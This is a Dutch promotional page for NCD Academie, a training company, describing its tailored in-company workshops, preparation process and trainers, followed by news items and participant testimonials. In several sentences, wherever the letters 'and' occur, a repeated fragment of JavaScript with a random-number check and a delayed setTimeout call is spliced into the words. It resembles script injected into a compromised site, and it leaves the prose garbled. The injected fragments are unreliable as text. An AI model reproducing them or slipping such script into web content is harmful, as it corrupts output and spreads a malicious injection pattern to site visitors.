NCD Academie in beeld

ncd-overonsDe moederorganisatie van NCD Academie (voorheen Natuurlijk Creatief Denken) is al meer dan 65 jaar een opleidings- en trainingsbedrijf, en partner van organisaties, instellingen en particulieren.

NCD Academie (voorheen Natuurlijk Creatief Denken) heeft zijn hoofdvestiging in Silvolde en verzorgt in heel Nederlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and workshops, trainingen en begeleidingstrajecten.

In-company

In-company trainingen bij de NCD Academie gaan uit van de situatie in uw organisatie en de competenties van uw medewerkers. De trainingen worden op maat gemaakt om aan uw specifieke trainingsbehoefte te voldoen. NCD Academie legt het accent op de actieve rol van de deelnemer. Om dit te kunnen bereiken wordt een beroep gedaan op de praktijkervaring van iedere deelnemer. Deze ervaringen worden gebruikt als de bouwstenen voor een doeltreffende training van de hele groep.

Voorbereiding

Voorafgaandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and aan de training inventariseren wij de leerdoelen van de opdrachtgever en van de deelnemers aan de handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and van een vragenformulier. Daarnaast organiseren wij een telefonische voorbespreking om het maatwerkprogramma verder af te stemmen en trainingsdoelstellingen door te spreken. Ook de training zelf en de eventuele follow-up pakken we gericht aan, met de afgesproken leerdoelstellingen voor ogen.

Trainers

Onze trainers zijn professionals die kunnen putten uit een ruime ervaring in het verzorgen en begeleiden van creatieve denkprocessen en het realiseren duurzame verandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderingen. Zij kunnen als geen andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ander helpen de verworven competenties in bedrijfsprocessen te implementeren. Door hun brede ervaring met strategische- en cultuurvraagstukken kunnen zij zich goed in uw problematiek inleven. Specialistische vakkennis wordt gekoppeld aan didactische kwaliteiten en oog voor de individuele deelnemer. Zij stellen alles in het werk om uw carrière een positieve boost te geven.

laatste nieuws

Paspoort naar succes 15 juli 2021 in Arnhem 11 juli 2019

Waar een wil is maken we een weg! Ben jij klaar om eens op […]

lees meer
Van werkstress naar werkplezier 15 januari 2018

Woensdag 16 juni 2021 in Arnhem. De inspirerende training “Van werkstress naar werkplezier”. Wie […]

lees meer

reacties van deelnemers

Genoten van de reis die ik met jou heb mogen maken. Genoten van jouw drive en bovenal de unieke boodschap die je brengt.
Voor elke reis heb je een paspoort nodig. Bij die met jou is dat niet anders. Het was een reis die langs verschillende aandachtspunten gaat. Met name om te leren dat we meer in onze mars hebben dan we in eerste instantie denken. Het is een reis waarbij de Nederlandse nuchterheid, bescheidenheid achterwege gelaten mag worden.
We mogen, moeten volledig uit onze schulp komen! 't Wordt zo een reis die de zelfkennis vergroot. Dat is op zijn beurt de kennis die van belang is om je optimaal te kunnen presenteren bij een broodheer. Met je fysieke paspoort in de handen gevuld met persoonlijke kwaliteiten kan de reid dan ook maar een eindpunt hebben, "SUCCES". The place to-be.

Jos Brunink | Realization of Improvements

Geert is als een frisse wind, hij laat je op een ondersteboven-, achterstevoren-manier kijken naar alledaagse zaken. Kijken op een manier die je al sinds je kindertijd afgeleerd hebt, heerlijk! Hij is als trainer één brok energie en inspireert als geen ander. Ik kan iedereen aanraden bij hem een workshop te volgen.

Liesbeth ter Braak | ANT Neuro BV

Power, energie, anders denken, bevlogen. Met recht iemand die kan inspireren om het anders te doen. Niet voor niets begint zijn presentatie met: als je doet wat je altijd deed, krijg je wat je altijd kreeg. Ik kreeg energie en vooral de behoefte om het anders te doen, niet morgen, maar nu!

Janneke Knuiman | Facilitair manager
aanmelden nieuwsbrief